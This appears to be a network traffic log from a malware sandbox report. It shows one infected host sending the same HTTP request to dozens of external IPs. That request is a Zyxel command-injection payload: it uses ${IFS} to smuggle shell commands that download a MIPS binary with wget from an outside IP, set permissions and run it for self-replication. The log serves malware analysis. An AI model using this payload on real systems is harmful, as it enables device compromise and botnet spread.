                                      Jan 14, 2024 15:50:38.100769997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2269192.168.2.145141642.59.25.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100825071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2270192.168.2.143420817.233.248.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100853920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2271192.168.2.144127462.174.42.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100907087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2272192.168.2.143465443.206.204.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100959063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2273192.168.2.14609164.187.108.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.100984097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2274192.168.2.1445218143.144.244.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101027966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2275192.168.2.1446868220.173.172.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101056099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2276192.168.2.145883836.89.96.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101089954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2277192.168.2.1437932202.242.97.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101125956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2278192.168.2.1438108211.224.62.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101172924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2279192.168.2.145552048.198.126.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101200104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2280192.168.2.1449858179.111.132.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101226091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2281192.168.2.1435688160.241.43.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101258993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2282192.168.2.143821679.113.109.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101289034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2283192.168.2.145703658.247.249.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101330996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2284192.168.2.1455604182.199.69.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101377010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2285192.168.2.1452990109.113.194.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101413965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2286192.168.2.1458784133.110.205.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101443052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2287192.168.2.145393634.149.27.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101502895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2288192.168.2.1454842114.96.200.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101525068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2289192.168.2.144072477.193.113.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101578951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2290192.168.2.145404012.238.196.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101617098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2291192.168.2.14596461.5.194.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101641893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2292192.168.2.1442456164.152.9.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101703882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2293192.168.2.1446702205.196.188.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101744890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2294192.168.2.144830069.115.203.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101767063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2295192.168.2.1445076156.126.153.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101819038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2296192.168.2.1440700220.55.63.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101857901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2297192.168.2.1457238103.33.189.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101896048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2298192.168.2.1435100195.42.96.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101922989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2299192.168.2.145483699.8.214.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.101968050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2300192.168.2.145459680.21.165.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102006912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2301192.168.2.1455394196.7.142.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102034092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2302192.168.2.1457094120.235.218.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102072954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2303192.168.2.145751265.235.172.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102111101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2304192.168.2.1434596222.247.161.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102160931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2305192.168.2.143671645.53.39.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102195978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2306192.168.2.1452252133.184.254.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102251053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2307192.168.2.144323697.195.255.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102283001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2308192.168.2.145585436.61.180.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102312088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2309192.168.2.143609094.64.152.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102336884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2310192.168.2.1447990205.93.5.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102372885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2311192.168.2.1442666156.66.221.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102412939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2312192.168.2.144625694.116.65.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102468967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2313192.168.2.1460834169.178.64.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102498055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2314192.168.2.1450230141.202.129.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102505922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2315192.168.2.14365922.201.142.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102560043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2316192.168.2.1446622143.70.101.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102607012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2317192.168.2.143555440.56.38.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102648973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2318192.168.2.1433740182.92.192.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102678061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2319192.168.2.143866267.218.110.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102746010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2320192.168.2.1442778217.185.46.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102770090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2321192.168.2.145605047.173.183.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102808952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2322192.168.2.1455644180.175.215.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102878094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2323192.168.2.143885461.188.235.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102909088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2324192.168.2.1450402177.249.34.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102936029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2325192.168.2.1458734207.165.244.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.102992058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2326192.168.2.1459612108.85.77.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103029966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2327192.168.2.1441978182.116.79.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103076935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2328192.168.2.1450980191.245.228.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103125095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2329192.168.2.145676267.233.73.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103147984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2330192.168.2.1457430166.11.42.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103188992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2331192.168.2.1445286107.207.176.19443
                                      TimestampBytes transferredDirectionData
